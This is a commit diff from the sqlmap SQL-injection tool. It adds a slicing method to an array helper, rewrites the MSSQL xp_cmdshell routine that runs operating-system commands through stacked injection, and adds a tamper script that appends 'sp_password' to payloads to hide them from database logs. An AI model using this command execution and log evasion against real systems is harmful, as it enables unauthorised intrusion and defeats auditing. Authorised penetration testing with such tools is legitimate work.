Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 982fcde

Browse files
stamparmstamparm
committed
Fix for Issue #62 
1 parent bc5025b commit 982fcde

3 files changed

Lines changed: 46 additions & 18 deletions

File tree

lib/core/bigarray.py

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -69,6 +69,14 @@ def _checkcache(self, index):
6969
with open(self.chunks[index], "rb") as fp:
7070
self.cache = Cache(index, pickle.load(fp), False)
7171

72+
def __getslice__(self, i, j):
73+
retval = BigArray()
74+
i = max(0, len(self) + i if i < 0 else i)
75+
j = min(len(self), len(self) + j if j < 0 else j)
76+
for _ in xrange(i, j):
77+
retval.append(self[_])
78+
return retval
79+
7280
def __getitem__(self, y):
7381
index = y / BIGARRAY_CHUNK_LENGTH
7482
offset = y % BIGARRAY_CHUNK_LENGTH

lib/takeover/xp_cmdshell.py

Lines changed: 5 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -9,6 +9,7 @@
99
from lib.core.common import Backend
1010
from lib.core.common import getSPQLSnippet
1111
from lib.core.common import hashDBWrite
12+
from lib.core.common import isListLike
1213
from lib.core.common import isNoneValue
1314
from lib.core.common import pushValue
1415
from lib.core.common import popValue
@@ -154,8 +155,6 @@ def xpCmdshellExecCmd(self, cmd, silent=False):
154155
return inject.goStacked(cmd, silent)
155156

156157
def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
157-
self.getRemoteTempPath()
158-
159158
if conf.direct:
160159
output = self.xpCmdshellExecCmd(cmd)
161160

@@ -170,23 +169,11 @@ def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
170169

171170
output = new_output
172171
else:
173-
tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
174-
cmd = "%s > \"%s\"" % (cmd, tmpFile)
175-
176-
self.xpCmdshellExecCmd(cmd)
177-
178-
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
179-
180-
self.delRemoteFile(tmpFile)
181-
182-
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)
172+
inject.goStacked("INSERT INTO %s EXEC %s '%s'" % (self.cmdTblName, self.xpCmdshellStr, cmd))
173+
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False)
183174
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
184-
185-
if output and isinstance(output, (list, tuple)):
186-
output = output[0]
187-
188-
if output and isinstance(output, (list, tuple)):
189-
output = output[0]
175+
if output and isListLike(output):
176+
output = output[1:]
190177

191178
return output
192179

tamper/sp_password.py

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
#!/usr/bin/env python
2+
3+
"""
4+
Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/)
5+
See the file 'doc/COPYING' for copying permission
6+
"""
7+
8+
from lib.core.enums import PRIORITY
9+
10+
__priority__ = PRIORITY.HIGH
11+
12+
def tamper(payload):
13+
"""
14+
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
15+
16+
Example:
17+
* Input: 1 AND 9227=9227--
18+
* Output: 1 AND 9227=9227--sp_password
19+
20+
Requirement:
21+
* MSSQL
22+
23+
Notes:
24+
* Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
25+
* Reference: http://websec.ca/kb/sql_injection
26+
"""
27+
28+
retVal = ""
29+
30+
if payload:
31+
retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "")
32+
33+
return retVal

0 commit comments

Comments
 (0)